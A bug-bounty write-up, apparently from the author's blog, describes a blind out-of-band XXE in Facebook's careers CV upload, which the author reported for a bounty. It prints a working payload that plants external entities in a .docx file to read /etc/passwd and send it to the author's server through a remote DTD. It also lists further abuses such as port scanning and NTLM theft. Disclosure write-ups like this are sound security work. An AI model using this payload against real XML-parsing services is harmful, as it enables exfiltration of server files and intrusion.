How I Hacked Facebook with a Word Document

In one day I decided to stop hunting Bugs in Facebook Mobile android , IOS and Windows phone apps and start hunting bugs in facebook.com website. I said to myself can i hack Facebook? or any of Facebook’s websites or servers? I said why not?!

Facebook as you know is pretty secure because of many people already reported high severity security bugs since 2010 and they patched a dangerous XXE Vulnerability affecting OpenID in late 2013 and They said that all of their servers are patched according to this post by their security team:https://www.facebook.com/BugBounty/posts/778897822124446

I thought it is a DEAD end and i can’t find any XXE vulnerabilities after Facebook patched their servers with Takedown tool they developed but I challenged myself to find XXE in Facebook and after some time i found this URL:https://www.facebook.com/careers/ then i tried to upload my CV and it was accepted and uploaded successfully BUT i can only upload PDF and DOCX files but i already know that .docx files are zipped xml files developed by Microsoft according to wikipedia: http://en.wikipedia.org/wiki/Office_Open_XML

I simply opened MS word 2010 then typed some random text and saved it on my desktop as: CV.docx after that i successfully uploaded it to Facebook and Nothing fancy happened as you expected but I must find a vulnerability today or i will lose my challenge :)

I quickly opened CV.docx with 7zip program on windows 7 and extracted all the contents of CV.docx file then i found some xml files and i decided to open this file: [Content_Types].xml and insert this innocent xml code:

<!DOCTYPE root [

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % dtd SYSTEM "http://197.37.102.90/ext.dtd">

%dtd;

%send;

]]>

Now i have a forged CV.docx file and it is ready to Rock after that i opened port 80 in my home router and started python simple http server:

mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80

Password:

Serving HTTP on 0.0.0.0 port 80 …

I already have another file ext.dtd waiting in mohaab007 directory and here is the content of ext.dtd:

<!ENTITY % all

"<!ENTITY % send SYSTEM 'http://197.37.102.90/FACEBOOK-HACKED?%25file;'>"

%all;

I inserted my External IP address and all i want to see is a response in python http server saying that something is trying to connect to me. Now every thing is good and then i uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute but Nothing happened. I said to myself it is a total failure and i will check my Facebook profile instead and chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minute or so chatting and browsing now it is time to stop python http server and close Facebook and everything <It is enough for today/>. I was going to close my terminal window and i was shocked to see that something connected to my python http server:

I said WOOOOOOT I forced a server belongs to Facebook to connect to my Python HTTP server using a sneaky way and now I can DO:

1- DoS on the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con

2- TCP scans using HTTP external entities (including behind firewalls since application servers often have world view different from that of the attacker)

3- Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back)

4- DoS on other systems (if parsing system is allowed to establishTCP connections to other systems)

5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)

6- Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS.

7- Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper.

I tried to read system files but the application doesn’t have privileges to read files or it might be some kind of protection in place or or or … BUT I am 100% sure it is Blind XXE Out Of Band (OOB) plus it was a time consuming process because i need to upload and wait the result after 15 minutes or more and i don’t waste too much time and reported it to Facebook Security team and They rejected my bug report and said:

I sent a reply and they said:

Now I am LOST and said to myself HAHAHA it was a good time but it is over and it is not a Vulnerability after all but i got two connections from Facebook’s server plus CV.docx file is corrupted and can’t be opened with MS Office. After exchanging emails with Facebook security team, i got this reply:

BAAAAAAAAAAAAAM

Now it is time to take a rest and wait them to fix it.....

NOTE:

Now it is fixed and Facebook rewarded me with a nice bounty after that i found similar vulnerabilities in other websites using the same method. The funny thing is Facebook said that they patched all of their servers by adding this line: libxml_disable_entity_loader(true) however i forced Facebook server to parse my external entities to do things i wanted and you can watch a video below showing you how i did it.

POC Video ( Facebook Blind XXE OOB):

References:

http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf (Must Read)

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf

https://www.youtube.com/watch?v=eBm0YhBrT_c

http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf

http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf

I am Listed in Facebook White hats (2014):

https://www.facebook.com/whitehat/thanks/

Source from my own blog: